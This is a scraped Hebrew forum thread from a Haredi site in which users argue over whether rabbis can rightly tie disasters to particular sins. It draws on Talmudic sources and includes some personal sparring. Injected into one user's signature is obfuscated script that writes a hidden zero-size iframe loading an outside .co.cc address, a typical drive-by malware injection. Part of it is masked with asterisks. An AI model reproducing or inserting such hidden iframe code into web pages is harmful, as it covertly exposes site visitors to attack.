בית פורומים עצור כאן חושבים

למה עשה זאת אלוקים - לנו ולא להם?

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-30/11/2014 03:23 לינק ישיר 

תוקן על ידי נישטאיך ב- 30/11/2014 04:20:37

דדווח על תוכן פוגעני

נשלח ב-30/11/2014 04:17 לינק ישיר 

מיימוני

>אדם לשאול מה יש לו לתקן<

ההדגשה היא על מה יש לו לתקן, ולא להאשים אחרים בצרות.

"תניא מעשה באדם אחד שהיה קורא למעלה מרבי אליעזר הודע את ירושלים את תועבותיה, אמר לו: עד שאתה בודק בתועבות ירושלים צא ובדוק בתועבות אמך, בדקו אחריו ומצאו בו שמץ פסול". (מגילה דף כה עמ' ב, ובמקבילה במסכת סופרים סוף פרק ט: "מעשה באחד שהפטיר בהודע את ירושלם, אמר לו ר' אליעזר ילך אותו האיש וידע בתועבותיה של אמו, בדקו אחריו ונמצא ממזר).

http://www.bhol.co.il/forums/topic.asp?cat_id=4&topic_id=3070008&forum_id=771

אריאל

>רק להבהרה: גם חז''ל היו מגוחכים, מצחיקים והרסניים<?

ההבהרה: ייתכן שחז"ל רצו להדגיש את גודל העבירה ולא את הסיבה לעונש, כי אילו ידעו את החטא לפי העונש, איך הם האשימו את דייני ישראל בכל הצרות.

לעולם לא נדע למה-לא בשכר ולא בעונש.

דדווח על תוכן פוגעני

נשלח ב-30/11/2014 10:53 לינק ישיר 

נישט, אכן,לא נדע.

בעקבות קביעה זאת נשאלת השאלה לשם מה נותן הקב"ה את  השכר והעונש? אם איננו יודעים את הסיבה איננו יכולים להפיק את הלקחים .

תוקן על ידי אפריםבן ב- 30/11/2014 10:53:53

דדווח על תוכן פוגעני

נשלח ב-30/11/2014 10:55 לינק ישיר 

אפריים
הרי אנו יודעים- כי שכר מצווה בהאי עלמא ליכא. לא עונש ולא פרס.

דדווח על תוכן פוגעני

נשלח ב-30/11/2014 14:38 לינק ישיר 

נישט, מאתיים אייקונים ירוקים ממימוני וכל החבורה.
אני מבין שכך אתה אוהב את זה, אז קבל.

דדווח על תוכן פוגעני

נשלח ב-30/11/2014 22:17 לינק ישיר 

ישיבישער

אל נא באפך. אהבת האמת שלך והנאמנות שלך לדיוק ולהצגה נכונה של דברי רבותינו ראויות הן לכל שבח. ואם איקון ירוק הוא שבח, אז טול גם אתה על כל מאמציך באשכול הזה.

אני רוצה להתייחס למה שכתבת לעיל ואני מעתיק:

מיימוני, במחילה אתה לא מסכם את הדברים נכונה. נישט לא בא בשאלה: מדוע מצביעים על חטא א', במקום על חטא ב' שלדעתו הוא הסיבה (מישהו דיבר כאן על סמינרים?).

אלא להיפך: בטענה שאין ילוד אשה יכול להסביר צרה בחטא כל שהוא, ושזה מגוחך ומצחיק.

אם טעיתי אני חוזר בי ותודה על התיקון. אבל גם אם הטענה של נישטאיך היתה שלא ניתן לדעת בודאות (או בכל רמה שהיא) מה העוון שגרם לאסון, הוא צדק. מצד שני, איני סבור כמוהו שאין טעם לעורר ולהצביע על חטאים אופיינים לדור.

אני כן סבור, כנראה כמוהו, שיש חטאים הרבה יותר גרועים מאלו שמופיעים בכותרות של אתרים או עיתונים.

ויש להוסיף, למרבה הצער הוא שוב צודק, שיש כאלו שמציעים הסברים רחוקים, דחוקים, לא נכונים ומקוממים. כאלו שהם מהוים עלבון למנהיג העולם. (דוגמא קיצונית שלא נאמרה כנראה: מי שיאמר שאסון קרה בגלל שגברים הולכים עם שעון יד.... האם תסכים שזו תהיה הגזמה, אמירה לא נכונה, מזיקה וגם, מבחינה מסויימת, מגוחכת?).

וכן בטענה נוספת שאין זכות לפוסק לשלול לגיטימיות של דעה אחרת בטענה שהיא מחוץ למערכת.

שתי הטענות האלו שגויות.

הטענה השניה שכתבת, עבורי, היא הזמנה לדיון שקשה לי לנהל בלי להיכנס להרחבות רבות שלו. אני יכול לומר בקיצור רק כך: שקשה מאד לקבוע מתוך המערכת מה הם הגבולות הלגיטימיים שלה.

עם זאת, נראה שרבנים מפורסמים, או לפחות המדברים בשמם (וזה לא אותו דבר) נוטים לפסול ולשרטט קוים אדומים לא בגלל שהם חייבים להיות כך ולא אחרת אלא בגלל שהם מגדירים קבוצות חברתיות.

באופן אחר אפשר לומר שנעשה שימוש במטרה ראויה מאד של הפקת לקחים והתעוררות לתשובה מאסון למטרה פחות ראויה ולא שייכת לאותו תחום דיון שהיא חיזוק מערכת שהיא חברתית לא פחות מאשר הלכתית וביצור חומות נגד תופעות שלא ברור שהן אסורות או שהן כה חמורות ובמיוחד בהשוואה לבעיות שיש וצריך להתריע עליהן.

נכון: יצאתי מחוץ למה שכתב נישטאיך בפועל ועברתי אל מה שאני חושב ומרגיש ומשער שגם הוא חושב ומרגיש. למעשה, אני מוכן להאמין שגם אתה חושב ומרגיש כך. האם לך לא כואב שמוחים על משהו כמעט פוליטי במקום למחות על בעיות חמורות יותר (נניח: גזענות או גזל כספי ציבור)? איני רוצה לפתוח פתח להכנסת רכילות, נושאים פוליטיים ואחרים לפורום, אבל דומה שזו בעיה שהיה צריך להתריע עליה ולטפל בה ככל שהדבר אפשרי.

האם אתה מסכים למה שכתבתי?

__תוקנה טעות הקלדה והוחלף ניסוח לברור יותר, אני מקוה_______________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 30/11/2014 22:19:39

דדווח על תוכן פוגעני

נשלח ב-1/12/2014 03:48 לינק ישיר 

ירוחם 

<הרי אנו יודעים- כי שכר מצווה בהאי עלמא ליכא. לא עונש ולא פרס>

יש שכר ויש עונש-ראה בשתי התוכחות ועוד, אך הבעיה היא ברמה האישית-של רשע וטוב לו צדיק ורע לו.

ישיבישער 

<נישט, מאתיים אייקונים ירוקים ממימוני וכל החבורה. אני מבין שכך אתה אוהב את זה, אז קבל>.

אתה מבין, יודע וקובע דברים שאני לא ידעתי.

אפרים בן

<בעקבות קביעה זאת נשאלת השאלה לשם מה נותן הקב"ה את  השכר והעונש? אם איננו יודעים את הסיבה איננו יכולים להפיק את הלקחים>

ייתכן (ולא כיודע דעת עליון) שמטרתם של השכר והעונש היא לגרום לאדם לעשות את המוטל עליו באופן כללי, ולא כדי להצביע על חטאי אחרים, ולא להצביע על "חטאי" אחרים לצרכים שהם פופולריים באותה שעה בכותרות העתונות החרדית.

מיימוני

<מצד שני, איני סבור כמוהו שאין טעם לעורר ולהצביע על חטאים אופיינים לדור>

כבר כתבתי בעבר, שאיני טוען שאין טעם לעורר ולהצביע על חטאים אופיינים לדור, אלא כתבתי שאין טעם לעורר ולהצביע על אסונות בגלל "חטאי" אחרים, ובאותה עת לא להתריע לדוגמה על התנהגות הנתונים להשפעתו. 

לדוגמה: 

http://www.bhol.co.il/Article.aspx?id=76554&cat=6

דדווח על תוכן פוגעני

נשלח ב-1/12/2014 08:59 לינק ישיר 

מיימוני כתב:
ישיבישער

האם אתה מסכים למה שכתבתי?

איש יקר, יש לך יתרון עצום, מתוך מליארדים בעולם, הרוב המוחלט יסכימו איתך, למעשה, ישנו רק פסיק אחוז שיודע לקרוא עברית ויוכל לראות בעצמו מה כתב נישטאיך ומה השיבותיו. כל השאר יסכימו אתך בשמחה, כה לחי.

דדווח על תוכן פוגעני

נשלח ב-1/12/2014 09:45 לינק ישיר 

ישיבישער יקר וחביב

האם הנושא שלנו הוא:

מה שטען נישטאיך.

מה היחס הראוי לאסונות כלומר איך לומדים מהם לתשובה. (לפרט, לציבור, למנהיגי הציבור על מה עליהם לדבר). וזה יכול להיות קשור לדברי נישטאיך - או שלא.

ואיקון ירוק על ההומור החד. זה מה שנקרא ציניות יפה - ולתשומת לב אלו שנקלעים לעימות עם חבר פורום אחר. ציניות לא תמיד מובנת במבט ראשון, אבל היא אינה פסולה כלל.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-1/12/2014 13:04 לינק ישיר 

מי קובע מה הנושא "שלנו", נכון שלא באמת חשוב מה מישהו אמר, אבל יש מה שנקרא 'דין הפורום', שאם מישהו מתפתל סביב דברים לא נכונים, יש להבהיר לו זאת, למען הסדר הטוב בדיונים הבאים, שלא כל אחד יוכל להגיד מה שרוצה, ולאחר מכן לטעון שאמר ב', ולשאול שאלה ג', ושמימוני יבא לעזרתו ויחלק לו אייקונים משום שהוא ותיק ויש לו זקן לבן.

דדווח על תוכן פוגעני

נשלח ב-1/12/2014 21:26 לינק ישיר 

ישיבישער

לאו דווקא.

משחר ימי הפורום אני רגיל לבדוק טיעון, לחלץ מתוכו מה שנראה חשוב, ולהתעלם מהשאר. או אם זה שגוי ומטעה, להעיר על זה לפי ענ"ד.

אני סבור שזה מועיל יותר מציניות.

למעשה, גם אם מישהו מרגיז אותי באמונותיו, אני יודע, גם מהנסיון, ששום דבר לא יעזור לי לתקן את העולם ואותו, רק לנסות להידבר איתו בשפה נעימה, במאור פנים, עד שנגיע להסכמה.

אבל איני אומר קבלו דעתי. אני רק מתאר וממליץ. וכל אחד ישפוט  לעצמו.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-2/12/2014 08:17 לינק ישיר 

דיון מוזר
מן הסתם הרבנים אינם חושבים שזו סיבת האירוע אלא משתמשים בו כמנוף מוסרי
אשתי לעולם תזכור כיצד בימי בחורותיה היה פיגוע ובו נהרגו כמה משכונתה. בהלוויה נמנו סיבות כמספר המספידים (או יותר נכון - כמספר ה"מעוררים") וחלקן אינן אפילו חומרא דחומרא

דדווח על תוכן פוגעני

נשלח ב-2/12/2014 08:47 לינק ישיר 

לא נורא אנחנו אוהבים אותך גם כך.

דדווח על תוכן פוגעני

נשלח ב-2/12/2014 09:46 לינק ישיר 

תלמיד
איזה מן מנוף מוסרי זה לומר שההם רשעים?

דדווח על תוכן פוגעני

נשלח ב-2/12/2014 10:18 לינק ישיר 

תלמיד

<מן הסתם הרבנים אינם חושבים שזו סיבת האירוע אלא משתמשים בו כמנוף מוסרי>

הבעיה היא כשהם מאשימים "עבירות" של אחרים, נותנים את הרושם שהם יודעים למה עשה זאת אלוקים, או שהם חושבים שהם מצדיקים את מעשי האלוקים.

סיבות כמו שבקרב ששת מליוני היהודים שנהרגו בשואה היו ממזרים רבים, או שרעידת האדמה היתה כעונש על משכבי זכר, הדיבורים על גיוס בני הישיבות, העלאת מחיר הלחם, אינן מנוף רוחני.

ראה כאן:

תוקן על ידי נישטאיך ב- 02/12/2014 10:21:02

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > למה עשה זאת אלוקים - לנו ולא להם?
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 6 לדף הבא סך הכל 6 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.